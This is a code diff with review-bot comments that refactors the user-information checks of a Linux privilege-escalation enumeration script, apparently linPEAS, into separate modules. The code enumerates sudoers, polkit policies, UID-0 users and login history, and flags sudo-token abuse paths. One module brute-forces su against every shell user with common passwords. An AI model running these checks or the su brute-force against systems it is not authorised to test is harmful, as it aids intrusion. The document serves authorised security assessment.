(echo "$PASSWORD" | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g") 2>/dev/null || echo_not_found "sudo"
fi
( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" ) 2>/dev/null || echo_not_found "/etc/sudoers"
if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then
echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW},"
fi
for filename in /etc/sudoers.d/*; do
if [ -r "$filename" ]; then
echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g"
grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g"
fi
done
echo ""
#-- UI) Sudo tokens
print_2title "Checking sudo tokens"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens"
ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)"
if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then
echo "ptrace protection is disabled (0), so sudo tokens could be abused" | sed "s,is disabled,${SED_RED},g";
if [ "$(command -v gdb 2>/dev/null)" ]; then
echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g";
fi
if [ "$CURRENT_USER_PIVOT_PID" ]; then
echo "The current user proc $CURRENT_USER_PIVOT_PID is the parent of a different user proccess" | sed -${E} "s,.*,${SED_RED},g";
fi
if [ -f "$HOME/.sudo_as_admin_successful" ]; then
echo "Current user has .sudo_as_admin_successful file, so he can execute with sudo" | sed -${E} "s,.*,${SED_RED},";
fi
if ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -v " " | grep -qE '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'; then
echo "Current user has other interactive shells running: " | sed -${E} "s,.*,${SED_RED},g";
ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -v " " | grep -E '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'
fi
else
echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g";
fi
echo ""
#-- UI) Doas
if [ -f "/etc/doas.conf" ] || [ "$DEBUG" ]; then
print_2title "Checking doas.conf"
doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null)
if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then
cat /etc/doas.conf "$doas_dir_name/doas.conf" "$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW},"
else echo_not_found "doas.conf"
fi
echo ""
fi
#-- UI) Pkexec policy
print_2title "Checking Pkexec policy"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2"
(cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d"
echo ""
#-- UI) Superusers
print_2title "Superusers"
awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED},"
echo ""
#-- UI) Users with console
print_2title "Users with console"
if [ "$MACPEAS" ]; then
dscl . list /Users | while read uname; do
ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2)
if grep -q "$ushell" /etc/shells; then #Shell user
dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
echo ""
fi
done
else
no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq)
unexpected_shells=""
printf "%s\n" "$no_shells" | while read f; do
if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then
unexpected_shells="$f\n$unexpected_shells"
fi
done
grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
if [ "$unexpected_shells" ]; then
printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g"
echo "Unexpected users with shells:"
printf "%s\n" "$unexpected_shells" | while read f; do
if [ "$f" ]; then
grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g"
fi
done
fi
fi
echo ""
#-- UI) All users & groups
print_2title "All users & groups"
if [ "$MACPEAS" ]; then
dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
else
cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
fi
echo ""
#-- UI) Login now
print_2title "Login now"
(w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
echo ""
#-- UI) Last logons
print_2title "Last logons"
(last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
echo ""
#-- UI) Login info
print_2title "Last time logon each user"
lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
EXISTS_FINGER="$(command -v finger 2>/dev/null)"
if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then
dscl . list /Users | while read uname; do
ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2)
if grep -q "$ushell" /etc/shells; then #Shell user
finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
echo ""
fi
done
fi
echo ""
#-- UI) Password policy
if [ "$EXTRA_CHECKS" ]; then
print_2title "Password policy"
grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs"
echo ""
if [ "$MACPEAS" ]; then
print_2title "Relevant last user info and user configs"
defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null
echo ""
print_2title "Guest user status"
sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
echo ""
fi
fi
#-- UI) Brute su
if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ]; then
print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC
POSSIBE_SU_BRUTE=$(check_if_su_brute);
if [ "$POSSIBE_SU_BRUTE" ]; then
SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1)
printf "%s\n" "$SHELLUSERS" | while read u; do
echo " Bruteforcing user $u..."
su_brute_user_num "$u" $PASSTRY
done
else
printf $GREEN"It's not possible to brute-force su.\n\n"$NC
fi
else
print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)\n"$NC
fi
print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC
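Review bot: this deletion removes checks that none of the new modules visible in this diff reproduce: PGP keys (`Do I have PGP keys?`), clipboard contents, `sudo -l` and `/etc/sudoers.d`, sudo tokens and `ptrace_scope`, `doas.conf`, password policy from `/etc/login.defs`, `lastlog`, the macOS login hooks, keychain and SystemKey checks, and the `su` brute-force test. Confirm each has a replacement module elsewhere in this PR before merging. If the sudoers logic is ported, do not carry over `grep -Iv "^$" cat /etc/sudoers | grep -v "#"`, where `cat` is passed to grep as a file name; the new UG_Superusers module in this diff reads `/etc/sudoers` directly, which is the correct form.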

View File

@ -0,0 +1,60 @@
# Title: Users Information - Pkexec
# ID: UG_Pkexec
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Check Pkexec policy and related files for privilege escalation
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, print_info
# Global Variables: $Groups, $groupsB, $groupsVB, $nosh_usrs, $sh_usrs, $USER
# Initial Functions:
# Generated Global Variables: $pkexec_bin, $policy_dir, $policy_file
# Fat linpeas: 0
# Small linpeas: 1
print_2title "Checking Pkexec and Polkit"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html#pe---method-2"
echo ""
print_3title "Polkit Binary"
# Check pkexec binary
pkexec_bin=$(command -v pkexec 2>/dev/null)
if [ -n "$pkexec_bin" ]; then
echo "Pkexec binary found at: $pkexec_bin" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
if [ -u "$pkexec_bin" ]; then
echo "Pkexec binary has SUID bit set!" | sed -${E} "s,.*,${SED_RED},g"
fi
ls -l "$pkexec_bin" 2>/dev/null
# Check polkit version for known vulnerabilities
if command -v pkexec >/dev/null 2>&1; then
pkexec --version 2>/dev/null
fi
fi
# Check polkit policies
echo ""
print_3title "Polkit Policies"
for policy_dir in "/etc/polkit-1/localauthority.conf.d/" "/etc/polkit-1/rules.d/" "/usr/share/polkit-1/rules.d/"; do
if [ -d "$policy_dir" ]; then
echo "Checking $policy_dir:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
if [ -w "$policy_dir" ]; then
echo "WARNING: $policy_dir is writable!" | sed -${E} "s,.*,${SED_RED},g"
fi
for policy_file in "$policy_dir"/*; do
if [ -f "$policy_file" ]; then
if [ -w "$policy_file" ]; then
echo "WARNING: $policy_file is writable!" | sed -${E} "s,.*,${SED_RED},g"
fi
cat "$policy_file" 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$Groups,${SED_RED},g"
fi
done
fi
done
# Check for polkit authentication agent
echo ""
print_3title "Polkit Authentication Agent"
ps aux 2>/dev/null | grep -i "polkit" | grep -v "grep"
echo ""
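Review bot: the header `# Functions Used: print_2title, print_info` is incomplete; this module also calls `print_3title` three times (`print_3title "Polkit Binary"` and following). If the builder uses that header to decide which helpers to include, the small build will miss it. Also, `if command -v pkexec >/dev/null 2>&1; then` nested inside `if [ -n "$pkexec_bin" ]; then` re-tests what `pkexec_bin=$(command -v pkexec 2>/dev/null)` already established; run `"$pkexec_bin" --version` directly. Finally, the policy walk over `localauthority.conf.d`, `/etc/polkit-1/rules.d/` and `/usr/share/polkit-1/rules.d/` does not cover the `.pkla` directories `/etc/polkit-1/localauthority/` and `/var/lib/polkit-1/localauthority/` used by older polkit; consider adding them.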

View File

@ -0,0 +1,37 @@
# Title: Users Information - Superusers
# ID: UG_Superusers
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Check for superusers and users with UID 0
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, print_info
# Global Variables: $knw_usrs, $nosh_usrs, $sh_usrs, $USER
# Initial Functions:
# Generated Global Variables: $group
# Fat linpeas: 0
# Small linpeas: 1
print_2title "Superusers and UID 0 Users"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html"
# Check /etc/passwd for UID 0 users
echo ""
print_3title "Users with UID 0 in /etc/passwd"
awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED_YELLOW},g" | sed "s,root,${SED_RED},g"
if [ command -v getent >/dev/null 2>&1 ]; then
for group in sudo wheel adm docker lxd lxc root shadow disk video; do
if getent group "$group" >/dev/null 2>&1; then
echo "- Users in group '$group':"
getent group "$group" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_RED},g"
fi
done
fi
# Check for users with sudo privileges in sudoers
echo ""
print_3title "Users with sudo privileges in sudoers"
grep -v "^#" /etc/sudoers 2>/dev/null | grep -v "^$" | grep -v "^Defaults" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED_YELLOW},g" | sed "s,root,${SED_RED},g"
echo ""
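Review bot: the getent guard is malformed: `if [ command -v getent >/dev/null 2>&1 ]; then` runs `[` with the three arguments `command -v getent` (the redirections apply to `[` itself), which is not a valid test expression, so the entire group-membership block is skipped on every host. It should read `if command -v getent >/dev/null 2>&1; then`. Also the header `# Functions Used: print_2title, print_info` omits `print_3title`, which this module calls twice.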

View File

@ -0,0 +1,44 @@
# Title: Users Information - Users with console
# ID: UG_Users_with_console
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Users with console
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title
# Global Variables: $MACPEAS, $sh_usrs, $USER
# Initial Functions:
# Generated Global Variables: $ushell, $no_shells, $unexpected_shells
# Fat linpeas: 0
# Small linpeas: 1
print_2title "Users with console"
if [ "$MACPEAS" ]; then
dscl . list /Users | while read un; do
ushell=$(dscl . -read "/Users/$un" UserShell | cut -d " " -f2)
if grep -q "$ushell" /etc/shells; then #Shell user
dscl . -read "/Users/$un" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
echo ""
fi
done
else
no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq)
unexpected_shells=""
printf "%s\n" "$no_shells" | while read f; do
if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then
unexpected_shells="$f\n$unexpected_shells"
fi
done
grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
if [ "$unexpected_shells" ]; then
printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g"
echo "Unexpected users with shells:"
printf "%s\n" "$unexpected_shells" | while read f; do
if [ "$f" ]; then
grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g"
fi
done
fi
fi
echo ""
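Review bot: the unexpected-shell detection cannot work as written: `printf "%s\n" "$no_shells" | while read f; do` runs the loop in a subshell (right-hand side of a pipe), so the assignment `unexpected_shells="$f\n$unexpected_shells"` is discarded when the loop ends and `if [ "$unexpected_shells" ]; then` is always false. Collect the matches as output of the loop instead, e.g. `unexpected_shells=$(printf ... | while read f; do ... && echo "$f"; done)`, or write to a temp file. The same pattern existed in the removed monolithic block, so this is a good moment to fix it. Separately, `$f -c 'whoami'` executes every non-shell login program listed in `/etc/passwd` with arbitrary arguments; consider skipping the well-known no-shell binaries (nologin, false) rather than running them.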

View File

@ -0,0 +1,22 @@
# Title: Users Information - Users & groups
# ID: UG_Users_groups
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Get all users & groups
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title
# Global Variables: $groupsB, $groupsVB, $knw_grps, $knw_usrs, $MACPEAS, $nosh_usrs, $sh_usrs, $USER
# Initial Functions:
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 1
print_2title "All users & groups"
if [ "$MACPEAS" ]; then
dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
else
cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
fi
echo ""

View File

@ -0,0 +1,57 @@
# Title: Users Information - Login now
# ID: UG_Login_now
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Check currently logged in users and their sessions
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title
# Global Variables: $knw_usrs, $nosh_usrs, $sh_usrs, $USER
# Initial Functions:
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 1
print_2title "Currently Logged in Users"
# Check basic user information
echo ""
print_3title "Basic user information"
(w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
# Check for active sessions
echo ""
print_3title "Active sessions"
if command -v w >/dev/null 2>&1; then
w 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
fi
# Check for logged in users via utmp
echo ""
print_3title "Logged in users (utmp)"
if [ -f "/var/run/utmp" ]; then
who -a 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
fi
# Check for SSH sessions
echo ""
print_3title "SSH sessions"
if command -v ss >/dev/null 2>&1; then
ss -tnp | grep ":22" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
fi
# Check for screen sessions
echo ""
print_3title "Screen sessions"
if command -v screen >/dev/null 2>&1; then
screen -ls 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
fi
# Check for tmux sessions
echo ""
print_3title "Tmux sessions"
if command -v tmux >/dev/null 2>&1; then
tmux list-sessions 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
fi
echo ""
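Review bot: the `# Functions Used:` header lists only `print_2title`, but the module calls `print_3title` six times; if the builder resolves dependencies from that header, `print_3title` must be added. In the SSH sessions block, `ss -tnp | grep ":22" 2>/dev/null` silences grep rather than ss, and `":22"` also matches ports such as 2222 or 22000; `ss -tnp 2>/dev/null | grep -E ':22[[:space:]]'` (or an ss filter on `sport = :22`) is more precise. The "Active sessions" block repeats the `w` output that `(w || who || finger || users)` already printed whenever `w` exists.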

View File

@ -0,0 +1,55 @@
# Title: Users Information - Last logons
# ID: UG_Last_logons
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Check last logons and login history
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title
# Global Variables: $knw_usrs, $nosh_usrs, $sh_usrs, $USER
# Initial Functions:
# Generated Global Variables: $EXISTS_FINGER, $ushell
# Fat linpeas: 0
# Small linpeas: 1
print_2title "Last Logons and Login History"
# Check last logins
echo ""
print_3title "Last logins"
if command -v last >/dev/null 2>&1; then
last -n 20 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
fi
# Check failed login attempts
echo ""
print_3title "Failed login attempts"
if command -v lastb >/dev/null 2>&1; then
lastb -n 20 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
fi
# Check auth logs for recent logins
echo ""
print_3title "Recent logins from auth.log (limit 20)"
if [ -f "/var/log/auth.log" ]; then
grep -i "login\|authentication\|accepted" /var/log/auth.log 2>/dev/null | tail -n 20 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
fi
# Last time logon each user
echo ""
if command -v lastlog >/dev/null 2>&1; then
print_3title "Last time logon each user"
lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
fi
EXISTS_FINGER="$(command -v finger 2>/dev/null || echo -n '')"
if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then
dscl . list /Users | while read un; do
ushell=$(dscl . -read "/Users/$un" UserShell | cut -d " " -f2)
if grep -q "$ushell" /etc/shells; then #Shell user
finger "$un" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
echo ""
fi
done
fi
echo ""
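Review bot: as in the previous module, `# Functions Used:` omits `print_3title`, which is called four times here. In the macOS finger loop, `ushell=$(dscl . -read "/Users/$un" UserShell | cut -d " " -f2)` is empty for accounts without a UserShell attribute, and `grep -q "$ushell" /etc/shells` then matches every line, so those accounts are treated as shell users; `grep -qx "$ushell" /etc/shells` (exact line match) fixes that and also avoids substring hits. `$un` is also missing from `# Generated Global Variables:`.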

View File

@ -0,0 +1,32 @@
# Title: Users Information - Password policy
# ID: UG_Password_policy
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Get assword policy
# License: GNU GPL
# Version: 1.0
# Functions Used: echo_not_found, print_2title
# Global Variables: $EXTRA_CHECKS, $MACPEAS
# Initial Functions:
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 0
if [ "$EXTRA_CHECKS" ]; then
print_2title "Password policy"
grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs"
echo ""
if [ "$MACPEAS" ]; then
print_2title "Relevant last user info and user configs"
defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null
echo ""
print_2title "Guest user status"
sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
echo ""
fi
fi
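Review bot: `# Description: Get assword policy` drops the p in "password". The three `sysadminctl ... status` lines pipe only stdout into sed, but on current macOS versions sysadminctl writes its status line to stderr (check with `sysadminctl -guestAccount status 2>/dev/null`, which prints nothing), so the enabled/disabled colouring never applies; adding `2>&1` before the first pipe, e.g. `sysadminctl -guestAccount status 2>&1 | sed ...`, makes it work.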

View File

@ -0,0 +1,31 @@
# Title: Users Information - Brute su
# ID: UG_Brute_su
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Brute su
# License: GNU GPL
# Version: 1.0
# Functions Used: check_if_su_brute, print_2title, su_brute_user_num
# Global Variables: $IAMROOT, $PASSTRY, $TIMEOUT
# Initial Functions:
# Generated Global Variables: $SHELLUSERS, $POSSIBE_SU_BRUTE
# Fat linpeas: 0
# Small linpeas: 0
if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ]; then
print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC
POSSIBE_SU_BRUTE=$(check_if_su_brute);
if [ "$POSSIBE_SU_BRUTE" ]; then
SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1)
printf "%s\n" "$SHELLUSERS" | while read u; do
echo " Bruteforcing user $u..."
su_brute_user_num "$u" $PASSTRY
done
else
printf $GREEN"It's not possible to brute-force su.\n\n"$NC
fi
else
print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)\n"$NC
fi
print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC
